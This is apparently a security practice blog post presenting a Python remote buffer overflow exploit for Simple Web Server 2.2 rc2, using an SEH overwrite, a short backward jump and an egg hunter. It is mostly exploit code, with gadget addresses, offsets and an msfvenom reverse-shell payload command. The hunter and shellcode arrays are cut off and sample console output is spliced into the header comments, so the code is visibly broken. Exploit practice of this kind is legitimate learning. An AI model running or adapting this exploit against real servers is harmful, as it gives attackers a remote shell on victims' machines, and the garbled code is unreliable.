Simple Web Server 2.2 rc2 – Remote Buffer Overflow (SEH Bypass + Egg Hunter)

I was looking for a vulnerable application to practice SEH Bypass and Egg Hunting techniques. I found this exploit on Exploit-DB which exploits a remote buffer overflow vulnerability in Simple Web Server 2.2 rc2.

The author of this vulnerability tested this exploit on a Windows XP machine and it’s a simple EIP overwrite exploit. I decided to modify it for reverse shell using SEH bypass and Egg Hunting as there was not much space left for the shellcode.

Here is the final exploit code:

#!/usr/bin/env python
import sys,socket

# Exploit Title: [Simple Web Server 2.2 rc2 - Remote Buffer Overflow (SEH Bypass + Egg Hunter) ]
# Date: [02/01/2018]
# Vulnerability Credit: [mr.pr0n (@_pr0n_)]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Home Page: []
# Vendor Homepage: []
# Version: [Simple Web Server 2.2 rc2]
# Tested on: [Windows 7]
# CVE : []
root@kali:~# ./
[+]Sending junk + egg hunter + shellcode to the target...
[+]Junk sent to the target...
[+]Got shell!!???


if len(sys.argv) <2:
    print "\n[+]Usage:\n ./ \n"

target = sys.argv[1]
#junk = "A" * 2300
#pattern_offset.rb shows offset at 2284
#This overwrites SEH record with Bs
#junk = "A" * 2284 + "B" * 4 + "C" * (2300 - 4 )

seh =  "\x7e\x44\xc5\x6f"	#0x6FC5447E	POP ESI, POP EDI, RETN

#junk = "A" * 2284 + seh + "C" * (2300 - 4 )
nseh = "\xeb\xd0\x90\x90"	#EB D0 - Short JMP 46 bytes backwards in memory. This gives us 46 bytes to put our egg hunter routine.
#junk = "A" * (2284 - 46 - len(nseh))+ "B" * 46 + nseh + seh + "C" * (2300 - 4 )
egg = "w00tw00t"	#A 4-byte tag to look for in memory

#32-byte egg hunter
hunter  =(

#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f c -b "\x00\x0a\x0d\x1a" EXITFUNC=thread
#payload size 351 bytes
shellcode = (

print "[+]Sending junk + egg hunter + shellcode to the target..."
junk = "A" * (2284 - len(egg) - len(shellcode) - 46 - len(nseh)) + egg + shellcode +  "\x90" * (46 - len(hunter)) +  hunter + nseh + seh + "C" * (2300 - 2284 -  4 )
buf = "GET / HTTP/1.1\n"
buf += "HOST: " + target + "\n"
buf += "User-Agent: Mozilla/5.0 \n" 
buf += "Connection: " + junk + "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 80))

print "[+]Junk sent to the target..."
print "[+]Got shell!!???"

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